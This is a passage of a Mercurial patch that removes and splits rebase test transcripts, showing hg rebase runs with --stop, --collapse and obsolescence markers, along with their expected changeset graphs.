rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [255] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== $ cd .. - $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete3.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete3.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete3.t @@ -18,1032 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . - rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. - -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. - - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 